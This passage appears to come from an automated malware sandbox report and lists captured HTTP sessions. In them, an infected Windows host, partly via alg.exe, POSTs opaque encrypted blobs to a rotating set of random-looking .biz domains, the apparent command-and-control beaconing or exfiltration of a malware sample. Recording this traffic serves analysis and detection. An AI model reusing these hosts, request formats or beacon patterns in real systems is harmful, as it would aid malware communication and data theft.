                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:46.079976082 CET778OUTData Raw: 80 d9 3c bb 7d ed 29 c0 fe 02 00 00 aa f0 0e db a3 cf b3 40 d0 fd ab 76 6b f2 ff 46 b3 42 23 44 ee 75 da 59 bc 40 c2 0b b0 67 45 57 5a e3 20 13 6b e5 f8 8b 67 c4 32 3a e1 06 43 e1 71 bc ec 7f 75 65 20 6f 6c cd 3e ee af a8 4c 8d a4 91 ea c0 93 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <})@vkFB#DuY@gEWZ kg2:Cque ol>LlfW*L3?9?]e9i& tmiat>r$cFP:>3q.Gz#7w]1^]+nx`&qe,0;F"f|T%M!Q)@
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:46.907140970 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:46 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=b3bde7807a9f6d36e355776f69b7f7d4|155.94.241.187|1731920326|1731920326|0|1|0; path=/; domain=.tnevuluw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      126192.168.2.75010547.129.31.21280
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:46.567945957 CET358OUTPOST /xcjwbjksxdykmrix HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: mnjmhp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:46.568195105 CET842OUTData Raw: 3f 9a d4 f8 06 99 19 a2 3e 03 00 00 58 e3 37 52 c5 de 3c cc 15 cc bb 30 82 f8 01 17 c5 65 05 d0 fd bd 29 54 0e 9e 67 90 33 51 c3 09 fa ba 4e ac 06 f8 7b dd ea 6f 81 ba 92 9f 85 a9 c2 8b 66 70 25 7c ec 5a 74 c3 f1 c9 70 15 4b e1 d5 5a 97 7c c5 85
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: ?>X7R<0e)Tg3QN{ofp%|ZtpKZ|6[]=<ojQs,(Gmc$wodpyo[? l&)o;z'#JQ2,A%$.=".K#XU$QG1X9ic)
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.058963060 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:47 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=d3db503bcbf792e34c2b8d11382b56c4|155.94.241.187|1731920327|1731920327|0|1|0; path=/; domain=.mnjmhp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      127192.168.2.75010618.141.10.107805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:47.396617889 CET353OUTPOST /jarjdamitgg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: whjovd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:47.396617889 CET778OUTData Raw: 88 d6 7a 15 1e 25 99 d1 fe 02 00 00 7c e5 0e a5 c7 05 7f f4 4b aa 94 a4 db ef f7 7c 7a 72 72 73 0a 4c 0d fc 4a 47 46 9c 99 27 86 bf 14 7a 76 62 9a e4 86 22 af 75 43 1c 1c 77 e6 a8 9a 91 6e 33 cc e3 df 09 45 9d 3b 29 b3 0a fa e8 f7 de 9b f1 ef 60
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: z%|K|zrrsLJGF'zvb"uCwn3E;)`"(!X(vyXj?8]hKKZ/X.xN2z,-j<n$=po:)K2PK4*c"a3|M9k+R45;[J)QL
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.861454964 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:48 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=19d94d89db08e42540628342b65771d1|155.94.241.187|1731920328|1731920328|0|1|0; path=/; domain=.whjovd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      128192.168.2.75010718.208.156.24880
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.076498985 CET348OUTPOST /ndn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: opowhhece.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.076572895 CET842OUTData Raw: 92 56 6f e8 5b dd 7c 1c 3e 03 00 00 40 0d 68 52 0e 9d 34 08 db fe 96 ac 50 bf d5 17 a5 f4 52 18 5d 6c a5 64 88 17 6f de 7f 13 88 b1 20 ce 00 17 eb cf 7f f7 8d d9 1e af 89 62 0d 73 5d cb 0e 6a 73 47 81 9b 21 53 23 e3 15 8b 9a 9c 8d 61 ea ed 25 23
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: Vo[|>@hR4PR]ldo bs]jsG!S#a%#F<ENO?Y2|o&x1[Z6n032^nhz6}EI@'+NL+Gx/ %ROSY's@a{#v<6^O9?HWtz
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.745724916 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:48 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=e940b966cb11c4443ba606645b3787ec|155.94.241.187|1731920328|1731920328|0|1|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      129192.168.2.75010813.251.16.15080
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.779853106 CET352OUTPOST /qdigkbbwou HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: jdhhbs.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.779870987 CET842OUTData Raw: 59 ad 65 10 c6 f3 32 0f 3e 03 00 00 47 5c 39 a4 f8 11 8c 03 1e a6 e1 1c 2e 0b 59 53 65 bc 04 a2 09 d9 94 45 95 a4 b4 5a 8e dd 84 df 12 b2 d8 a6 cb c6 4a f0 98 d7 44 12 10 c5 fe de a2 a1 10 88 f2 ba c1 03 2a 63 5a 68 1c 76 14 f1 ae af 0c aa b7 0c
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: Ye2>G\9.YSeEZJD*cZhvi^JU/7DpvwWq;.?zE'W^q13)GTOR'Fp}Yq]$8tCU ^}'NfdY9_,i=Jpu'w-`
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:50.212913990 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:49 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=8da43712577f17c1898e47fdcc0ce0fa|155.94.241.187|1731920329|1731920329|0|1|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      130192.168.2.750109208.100.26.245805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:49.288196087 CET361OUTPOST /jvsdbpglagvynifq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:49.288228989 CET778OUTData Raw: f0 b5 ab e3 20 2f 5f a6 fe 02 00 00 ea 24 3d 80 bd a7 41 86 8f 5b 30 33 91 55 c3 03 ce dc b3 74 d2 a8 10 ad 22 04 5f 35 e9 43 62 81 29 01 23 c3 97 04 17 51 c9 b4 f5 fd ac 6b ef 6a 1e c3 2f e4 b0 45 5b bf 24 80 e5 29 9a 84 78 82 46 2c e8 75 49 f3
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: /_$=A[03Ut"_5Cb)#Qkj/E[$)xF,uIZ_[_r/.Bz8-2Uwv8epg*m6D~Lv{ubg(\ bm=C? j'|cE(yjkrH.E|f*~NKD!
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:49.932056904 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:49 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:50.006220102 CET357OUTPOST /yeixpxtqdbgl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:50.006247044 CET778OUTData Raw: 50 64 61 ea 3c 32 82 2b fe 02 00 00 f4 cc 17 af 63 30 95 41 0e 71 e5 0c f4 0d 05 46 c4 10 16 4f 03 12 49 73 51 1f 01 c5 80 0a 3c 54 dd 57 ab 91 d9 dc 8b a9 bc 79 f3 cc 8c b0 da 3a ef a3 9c 67 29 a2 c8 a9 06 47 83 87 29 2c dd 23 65 62 52 02 01 58
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: Pda<2+c0AqFOIsQ<TWy:g)G),#ebRX(XDQS0k"8'Jm`@l^ec/sQpb9Puf3U^'5q"s'hTvj{MvK+4NfoN5~E>r*^~f`}vnH`u,5J0tD[*l
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:50.155575037 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:50 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      131192.168.2.75011034.246.200.16080
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:50.232249022 CET348OUTPOST /pnw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: mgmsclkyu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:50.232268095 CET842OUTData Raw: 16 0e 09 20 b4 a1 51 88 3e 03 00 00 86 8e a9 26 74 91 c8 34 74 a9 ec ff 9d 9e e5 84 79 a2 2b a1 e0 e2 bb 99 b5 3f b7 27 87 ca 25 36 35 f7 d9 92 a2 fc 1f 31 2a b2 90 79 10 68 43 61 91 c8 87 54 5b 34 46 87 4a 6d c9 49 6a 82 09 36 e5 48 7b 20 73 b0
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: Q>&t4ty+?'%651*yhCaT[4FJmIj6H{ s#&N'OWQCl^H;af6 0lR]K+UJB)hT}Z5"V%@HrY#LI{E8XH*oV6
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:51.194924116 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:51 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=d5f4fa8daf749d1d3d3b20eacb27c4ad|155.94.241.187|1731920331|1731920331|0|1|0; path=/; domain=.mgmsclkyu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      132192.168.2.75011144.221.84.105805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:50.605565071 CET359OUTPOST /xprpgfukortnennm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: reczwga.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:50.605565071 CET778OUTData Raw: 43 19 47 1c 31 22 f0 12 fe 02 00 00 66 f9 7b 44 38 a5 5b d4 f5 c9 70 60 87 ea c3 89 f6 b3 1d bf 17 4e 90 9d 9c cb 16 63 00 5f 48 99 f9 0e a1 e2 a5 c7 c6 35 1e 48 91 c2 4d 90 98 ce fc a9 55 ac 16 1f a4 0c fa 62 b2 e0 78 4b a8 76 91 fc 17 70 c1 fd
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: CG1"f{D8[p`Nc_H5HMUbxKvp)2Sxm3lBqIc%V+iGfeJ^"XCvT#J^Y!$l4;q`SV.9Q*'ZTSz}q2C9-]@A
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:51.274024010 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:51 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=03ec2935e19c8497db00707f1465b6d0|155.94.241.187|1731920331|1731920331|0|1|0; path=/; domain=.reczwga.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      133192.168.2.75011218.141.10.10780
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
